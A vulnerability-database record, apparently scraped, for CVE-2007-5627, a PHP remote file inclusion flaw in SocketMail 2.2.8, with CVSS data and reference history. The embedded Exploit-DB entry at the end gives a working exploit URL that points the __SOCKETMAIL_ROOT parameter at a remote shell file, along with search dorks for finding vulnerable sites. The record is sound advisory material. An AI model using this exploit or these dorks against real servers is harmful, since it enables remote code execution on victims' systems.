ID CVE-2007-5627
Type cve
Reporter NVD
Modified 2017-09-28T21:29:39
Description
PHP remote file inclusion vulnerability in content/fnc-readmail3.php in SocketMail 2.2.8 allows remote attackers to execute arbitrary PHP code via a URL in the __SOCKETMAIL_ROOT parameter.
{"id": "CVE-2007-5627", "bulletinFamily": "NVD", "title": "CVE-2007-5627", "description": "PHP remote file inclusion vulnerability in content/fnc-readmail3.php in SocketMail 2.2.8 allows remote attackers to execute arbitrary PHP code via a URL in the __SOCKETMAIL_ROOT parameter.", "published": "2007-10-23T12:46:00", "modified": "2017-09-28T21:29:39", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5627", "reporter": "NVD", "references": ["https://www.exploit-db.com/exploits/4554", "https://exchange.xforce.ibmcloud.com/vulnerabilities/37344", "http://www.securityfocus.com/bid/26162"], "cvelist": ["CVE-2007-5627"], "type": "cve", "lastseen": "2017-09-29T14:25:34", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:socketmail:socketmail:2.2.8"], "cvelist": ["CVE-2007-5627"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "PHP remote file inclusion vulnerability in content/fnc-readmail3.php in SocketMail 2.2.8 allows remote attackers to execute arbitrary PHP code via a URL in the __SOCKETMAIL_ROOT parameter.", "edition": 2, "enchantments": {}, "hash": "14ea1a33f0cdafc69b968f617526d39b92dbed6bedfa40c01ba458c87b336d54", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "d74a4301493dcdb8055d6d2513ad8d3e", "key": "modified"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "b831b8ed509de0af88d6ab5efc679424", "key": "published"}, {"hash": "76c88cf5a2f20a9920e4c252d86cfb0e", "key": "description"}, {"hash": "7912502ff0a61934a737806029842e44", "key": "title"}, {"hash": "59a9a013058f15ba12cb82ba40332d3f", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6196f586e3bf2c08abd685d870a91cd2", "key": "cvelist"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "7b001003538861c0160ae37eaee674af", "key": "cpe"}, {"hash": "58b0d07431cf789f73ac1619d7befbfb", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5627", "id": "CVE-2007-5627", "lastseen": "2017-07-29T11:22:19", "modified": "2017-07-28T21:33:46", "objectVersion": "1.3", "published": "2007-10-23T12:46:00", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/37344", "http://www.milw0rm.com/exploits/4554", "http://www.securityfocus.com/bid/26162"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-5627", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-07-29T11:22:19"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:socketmail:socketmail:2.2.8"], "cvelist": ["CVE-2007-5627"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "PHP remote file inclusion vulnerability in content/fnc-readmail3.php in SocketMail 2.2.8 allows remote attackers to execute arbitrary PHP code via a URL in the __SOCKETMAIL_ROOT parameter.", "edition": 1, "enchantments": {}, "hash": "d8da4399c51995d300c7bfb481ba1a269c3cab8ddcc080ff58f2888e44bf4ae7", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "b831b8ed509de0af88d6ab5efc679424", "key": "published"}, {"hash": "76c88cf5a2f20a9920e4c252d86cfb0e", "key": "description"}, {"hash": "7912502ff0a61934a737806029842e44", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "869945ccbe47a826952bb5df10254d48", "key": "references"}, {"hash": "6196f586e3bf2c08abd685d870a91cd2", "key": "cvelist"}, {"hash": "b203fe01cb7d8cc08bcde07b1e7bddf4", "key": "modified"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "7b001003538861c0160ae37eaee674af", "key": "cpe"}, {"hash": "58b0d07431cf789f73ac1619d7befbfb", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5627", "id": "CVE-2007-5627", "lastseen": "2016-09-03T09:41:07", "modified": "2008-09-05T17:31:15", "objectVersion": "1.2", "published": "2007-10-23T12:46:00", "references": ["http://xforce.iss.net/xforce/xfdb/37344", "http://www.milw0rm.com/exploits/4554", "http://www.securityfocus.com/bid/26162"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-5627", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T09:41:07"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "7b001003538861c0160ae37eaee674af"}, {"key": "cvelist", "hash": "6196f586e3bf2c08abd685d870a91cd2"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "76c88cf5a2f20a9920e4c252d86cfb0e"}, {"key": "href", "hash": "58b0d07431cf789f73ac1619d7befbfb"}, {"key": "modified", "hash": "a00599988138b314bf0189df7de8ae9b"}, {"key": "published", "hash": "b831b8ed509de0af88d6ab5efc679424"}, {"key": "references", "hash": "2a415e39ae9198b7d159b5500ae4dbf7"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "7912502ff0a61934a737806029842e44"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "05d44be7762f039024e690c9ad38123a2ca972d1b7765035f3bacd6fb111b8cf", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-09-29T14:25:34"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:4554"]}], "modified": "2017-09-29T14:25:34"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:socketmail:socketmail:2.2.8"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"exploitdb": [{"lastseen": "2016-01-31T21:12:49", "bulletinFamily": "exploit", "description": "SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability. CVE-2007-5627. Webapps exploit for php platform", "modified": "2007-10-22T00:00:00", "published": "2007-10-22T00:00:00", "id": "EDB-ID:4554", "href": "https://www.exploit-db.com/exploits/4554/", "type": "exploitdb", "title": "SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability", "sourceData": "Vulnerability Type: Remote File Inclusion\nVulnerable file: /mail/content/fnc-readmail3.php\nExploit URL: http://localhost/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://localhost/shell.txt?\nMethod: get\nRegister_globals: On\nVulnerable variable: __SOCKETMAIL_ROOT\nLine number: 399\nLines:\n\n----------------------------------------------\n} else {\n include_once($__SOCKETMAIL_ROOT.\"/content/fnc-readmail.std.php\");\n}\n\n----------------------------------------------\n\nGrEeTs To sHaDoW sEcUrItY TeAm, str0ke\n\nBiG sHoUt OuT tO udplink.net\n\nFoUnD By BiNgZa\n\nDoRk:\"Powered by SocketMail Lite version 2.2.8. Copyright \u00c2\u00a9 2002-2006\"\n\nDORK2: \"Powered by SocketMail\"\n\nshadowcrew@hotmail.co.uk\n\nshadow.php0h.com\n\n# milw0rm.com [2007-10-22]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4554/"}]}